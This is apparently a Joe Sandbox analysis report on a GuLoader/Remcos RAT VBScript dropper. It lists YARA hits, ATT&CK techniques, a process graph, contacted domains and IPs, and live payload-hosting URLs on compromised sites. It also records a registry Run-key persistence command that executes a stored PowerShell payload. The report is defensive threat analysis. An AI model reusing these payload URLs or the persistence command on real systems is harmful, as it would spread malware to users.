                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2994471945.0000000006C8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2536, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information221
                Scripting                		Valid Accounts11
                Windows Management Instrumentation                		221
                Scripting                		12
                Process Injection                		11
                Masquerading                		OS Credential Dumping21
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		1
                Registry Run Keys / Startup Folder                		1
                Registry Run Keys / Startup Folder                		1
                Modify Registry                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Exploitation for Client Execution                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		31
                Virtualization/Sandbox Evasion                		Security Account Manager31
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Ingress Tool Transfer                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                PowerShell                		Login HookLogin Hook12
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Obfuscated Files or Information                		LSA Secrets1
                File and Directory Discovery                		SSHKeylogging113
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials23
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565785 Sample: Beschwerde-AutoKauf.vbs Startdate: 30/11/2024 Architecture: WINDOWS Score: 100 48 www.tla-autos.com 2->48 50 www.elektroservice-neuruppin.de 2->50 52 5 other IPs or domains 2->52 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 84 11 other signatures 2->84 9 powershell.exe 10 34 2->9         started        14 wscript.exe 1 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 dnsIp5 54 www.tla-autos.com 45.88.88.33, 49738, 49739, 49740 LVLT-10753US Bulgaria 9->54 56 www.campingplatz-goldbergersee.de 92.205.55.123, 443, 49737 GD-EMEA-DC-SXB1DE Germany 9->56 58 geoplugin.net 178.237.33.50, 49741, 80 ATOM86-ASATOM86NL Netherlands 9->58 46 C:\Users\user\AppData\Local\...\romerret.vbs, ASCII 9->46 dropped 86 Found suspicious powershell code related to unpacking or dynamic code loading 9->86 18 wscript.exe 1 9->18         started        21 Acrobat.exe 72 9->21         started        23 cmd.exe 1 9->23         started        25 conhost.exe 9->25         started        88 VBScript performs obfuscated calls to suspicious functions 14->88 90 Suspicious powershell command line found 14->90 92 Wscript starts Powershell (via cmd or directly) 14->92 94 2 other signatures 14->94 27 powershell.exe 14 18 14->27         started        60 127.0.0.1 unknown unknown 16->60 file6 signatures7 process8 dnsIp9 68 Suspicious powershell command line found 18->68 70 Wscript starts Powershell (via cmd or directly) 18->70 72 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->72 74 Suspicious execution chain found 18->74 30 powershell.exe 15 16 18->30         started        33 AcroCEF.exe 107 21->33         started        35 conhost.exe 23->35         started        37 reg.exe 1 1 23->37         started        62 www.lebensraeume-ggmbh.de 217.160.0.118, 443, 49730 ONEANDONE-ASBrauerstrasse48DE Germany 27->62 76 Found suspicious powershell code related to unpacking or dynamic code loading 27->76 39 conhost.exe 27->39         started        signatures10 process11 dnsIp12 66 elektroservice-neuruppin.de 81.169.145.163, 443, 49742 STRATOSTRATOAGDE Germany 30->66 41 conhost.exe 30->41         started        43 AcroCEF.exe 33->43         started        process13 dnsIp14 64 23.200.196.138, 443, 49765 NOS_COMUNICACOESPT United States 43->64

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Beschwerde-AutoKauf.vbs8%ReversingLabsScript-WScript.Trojan.GuLoader

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                www.tla-autos.com0%Avira URL Cloudsafe
                https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pczP0%Avira URL Cloudsafe
                https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgLG14.bin100%Avira URL Cloudmalware
                https://www.elektroservice-neuruppin.de0%Avira URL Cloudsafe
                http://ns.adob0%Avira URL Cloudsafe
                https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pczXR0%Avira URL Cloudsafe
                https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pcz0%Avira URL Cloudsafe
                http://www.lebensraeume-ggmbh.de0%Avira URL Cloudsafe
                https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsg100%Avira URL Cloudmalware
                https://www.elektroservice-neuruppin.de/fileadmin/wolter/Overpainful.afmXR0%Avira URL Cloudsafe
                http://ns.ado0%Avira URL Cloudsafe
                https://www.campingplatz-goldbergersee.de/a0%Avira URL Cloudsafe
                https://www.elektroservice-neuruppin.de/fileadmin/wolter/Overpainful.afm0%Avira URL Cloudsafe
                https://www.lebensraeume-ggmbh.de0%Avira URL Cloudsafe
                https://www.campingplatz-goldbergersee.de/0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.tla-autos.com
                		45.88.88.33
                		truetrue
                  		unknown
                  elektroservice-neuruppin.de
                  		81.169.145.163
                  		truefalse
                    		unknown
                    www.campingplatz-goldbergersee.de
                    		92.205.55.123
                    		truefalse
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		high
                        www.lebensraeume-ggmbh.de
                        		217.160.0.118
                        		truefalse
                          		unknown
                          x1.i.lencr.org
                          		unknown
                          		unknownfalse
                            		high
                            www.elektroservice-neuruppin.de
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              www.tla-autos.comtrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pczfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgLG14.binfalse
                              • Avira URL Cloud: malware
                              		unknown
                              http://geoplugin.net/json.gpfalse
                                		high
                                https://www.elektroservice-neuruppin.de/fileadmin/wolter/Overpainful.afmfalse
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1843130154.000001E7E1F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2981270459.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2956429074.00000000044F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2956429074.00000000044F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000001.00000002.1814298668.000001E7D2A30000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://geoplugin.net/json.gp)powershell.exe, 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pczXRpowershell.exe, 00000003.00000002.2956429074.00000000044F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.2981270459.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.2981270459.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.lebensraeume-ggmbh.de/template/inc_css/specific/Kvidredes.pczPpowershell.exe, 00000001.00000002.1814298668.000001E7D20B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://geoplugin.net/json.gptpowershell.exe, 00000003.00000002.2952642850.000000000064A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.elektroservice-neuruppin.depowershell.exe, 0000000D.00000002.2956683707.0000000004E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000010.00000003.2178238555.000001C9792A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2178238555.000001C9792C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2178238555.000001C9792F4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2178238555.000001C9792E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.campingplatz-goldbergersee.de/wp-content/themes/twentyseventeen/assets/images/UGrVRaObsgpowershell.exe, 00000003.00000002.2994471945.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.3004531126.0000000007D45000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.elektroservice-neuruppin.de/fileadmin/wolter/Overpainful.afmXRpowershell.exe, 0000000D.00000002.2956683707.0000000004E35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2956429074.00000000044F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ns.adobpowershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000010.00000003.2178238555.000001C979272000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000010.00000003.2178238555.000001C97920E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.lebensraeume-ggmbh.depowershell.exe, 00000001.00000002.1814298668.000001E7D3AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000010.00000003.2178238555.000001C9792C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micropowershell.exe, 0000000D.00000002.2997271515.000000000770A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000010.00000003.2178238555.000001C9792C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2956429074.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2956683707.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://ns.adopowershell.exe, 00000003.00000002.3005727829.0000000007DF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://contoso.com/powershell.exe, 00000003.00000002.2981270459.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1843130154.000001E7E1F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2981270459.0000000005409000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.campingplatz-goldbergersee.de/apowershell.exe, 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://aka.ms/pscore68powershell.exe, 00000001.00000002.1814298668.000001E7D1E91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1814298668.000001E7D1E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2956429074.00000000043A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2956683707.0000000004CE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000010.00000003.2178238555.000001C9792C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.lebensraeume-ggmbh.depowershell.exe, 00000001.00000002.1814298668.000001E7D20B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1814298668.000001E7D3AE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.campingplatz-goldbergersee.de/powershell.exe, 00000003.00000002.3005727829.0000000007DB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        92.205.55.123
                                                                        		www.campingplatz-goldbergersee.deGermany
                                                                        		8972GD-EMEA-DC-SXB1DEfalse
                                                                        217.160.0.118
                                                                        		www.lebensraeume-ggmbh.deGermany
                                                                        		8560ONEANDONE-ASBrauerstrasse48DEfalse
                                                                        178.237.33.50
                                                                        		geoplugin.netNetherlands
                                                                        		8455ATOM86-ASATOM86NLfalse
                                                                        81.169.145.163
                                                                        		elektroservice-neuruppin.deGermany
                                                                        		6724STRATOSTRATOAGDEfalse
                                                                        23.200.196.138
                                                                        		unknownUnited States
                                                                        		2860NOS_COMUNICACOESPTfalse
                                                                        45.88.88.33
                                                                        		www.tla-autos.comBulgaria
                                                                        		10753LVLT-10753UStrue

                                                                        Private

                                                                        IP
                                                                        127.0.0.1

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1565785
                                                                        Start date and time:2024-11-30 20:14:06 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 42s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:21
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Beschwerde-AutoKauf.vbs
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.expl.evad.winVBS@32/61@10/7
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 99%
                                                                        • Number of executed functions: 147
                                                                        • Number of non-executed functions: 39
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .vbs

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 23.32.184.135, 2.19.126.143, 2.19.126.149, 3.219.243.226, 52.6.155.20, 3.233.129.217, 52.22.41.97, 162.159.61.3, 172.64.41.3, 23.32.185.164, 23.195.39.65
                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                                        • Execution Graph export aborted for target powershell.exe, PID 1620 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 2536 because it is empty
                                                                        • Execution Graph export aborted for target powershell.exe, PID 6272 because it is empty
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                        • VT rate limit hit for: Beschwerde-AutoKauf.vbs

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        14:14:58API Interceptor371250x Sleep call for process: powershell.exe modified
                                                                        14:15:47API Interceptor2x Sleep call for process: svchost.exe modified
                                                                        14:15:57API Interceptor1x Sleep call for process: AcroCEF.exe modified
                                                                        19:15:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Afskibning %Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)
                                                                        19:15:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Afskibning %Arerola142% -windowstyle 1 $Chamfrons=(gp -Path 'HKCU:\Software\Firspandets\').Davit;%Arerola142% ($Chamfrons)

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        92.205.55.123Markus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                          217.160.0.118Quote_General_Tech_LLC_637673,PDF.exeGet hashmaliciousFormBookBrowse
                                                                          • www.foerder.online/v148/
                                                                          HSBC Payment Advice.exeGet hashmaliciousFormBookBrowse
                                                                          • www.foerder.online/66wq/
                                                                          ZgDPnNtvhR.exeGet hashmaliciousFormBook, zgRATBrowse
                                                                          • www.goldenimps.com/sziq/?YV=lwX45io8yxoGvF5zKbLCNOpgNWKPi0SqKcyYj9LeH7nP+x7DIO1hMP0JXRM0KxiuVE3poR04Unb9hoSQtcf/m5m3cYYMqyNJKw==&pV1L=w6j86j4p8ZOxP
                                                                          DHL_Receipt_AWB811471018477.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/mfwr/?3V7lzz0h=lolxzXjdWDXUTwZ9d9JjutRupK/Jwh+szJpZZbVn51bTOJxzTCkU7SZEAFdqzWEZByIy+46zOz/nsruFI5+TQOG+gZBzeOwEDYj9WTHyBNHV&XxHt=AZJd
                                                                          PURCHASE_INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/udwf/?qx=H0uO9eqa9H4+1pEwNkAiwJx8mxhnWcAO9iqqSUOQwVxustMhVmK2XfhyG969cTY9zkG2DcDSVjwgaeUtmBgjxLLbQJEcVT5gvw==&P4Rl=OrjHjRSXOB2Xwb
                                                                          DHL_#AWB811471048477.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/mfwr/?6n8l=lolxzXjdWDXUTwZ9d9JjutRupK/Jwh+szJpZZbVn51bTOJxzTCkU7SZEAFdqzWEZByIy+46zOz/nsruFI5+TEty6pLZzOOpdGg==&zT=mZHXAd
                                                                          e-dekont_html.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/sziq/?pZ88=5vjh&1vfHSTkH=lwX45io8yxoGvF5yWLKvfp8+AzibrTOqKcyYj9LeH7nP+x7DIO1hMP0JXRM0KxiuVE3poR04Unb9hoSQtcf/j7n3YYYNpTZJKw==
                                                                          rDHLReceipt_8939977153.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/mfwr/?-rYt=lolxzXjdWDXUTwZ+RdJdt8RL0bDd5GSszJpZZbVn51bTOJxzTCkU7SZEAFdqzWEZByIy+46zOz/nsruFI5+BOOD9u4xVfcUxGw==&UR4px=WrcLqfW0C2upN
                                                                          DHL_Receipt_#893915078.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/mfwr/?-X=lolxzXjdWDXUTwZ9d9JjutRupK/Jwh+szJpZZbVn51bTOJxzTCkU7SZEAFdqzWEZByIy+46zOz/nsruFI5+TQNz8tLpufvpdCIj9WXvBMtHV&U87D=xrLxZLZPp
                                                                          Maersk_K22TSI714881.exeGet hashmaliciousFormBookBrowse
                                                                          • www.goldenimps.com/mfwr/?M8_X=lolxzXjdWDXUTwZ9d9JjutRupK/Jwh+szJpZZbVn51bTOJxzTCkU7SZEAFdqzWEZByIy+46zOz/nsruFI5+TEuG+gZBuYvoxGw==&6zbT=1tqTa
                                                                          178.237.33.50#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                          • geoplugin.net/json.gp
                                                                          remi.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • geoplugin.net/json.gp
                                                                          rem.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • geoplugin.net/json.gp
                                                                          Salary Revision _pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                          • geoplugin.net/json.gp

                                                                          Domains

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          www.campingplatz-goldbergersee.deMarkus-Dokumenten-Kaufvertrag.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                          • 92.205.55.123
                                                                          geoplugin.net#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • 178.237.33.50
                                                                          PO 09770_MQ 018370_04847_Order.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          Draft - HBL# WSPAE1311198 VSL# COSCO NETHERLANDS V-067E.scr.exeGet hashmaliciousPureLog Stealer, RemcosBrowse
                                                                          • 178.237.33.50
                                                                          17327986255b9be8bc9d871d6e246d7270b6644e5b5c3b696cfd132458bc59c32794b51c09844.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                          • 178.237.33.50
                                                                          SC_TR126089907.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                          • 178.237.33.50
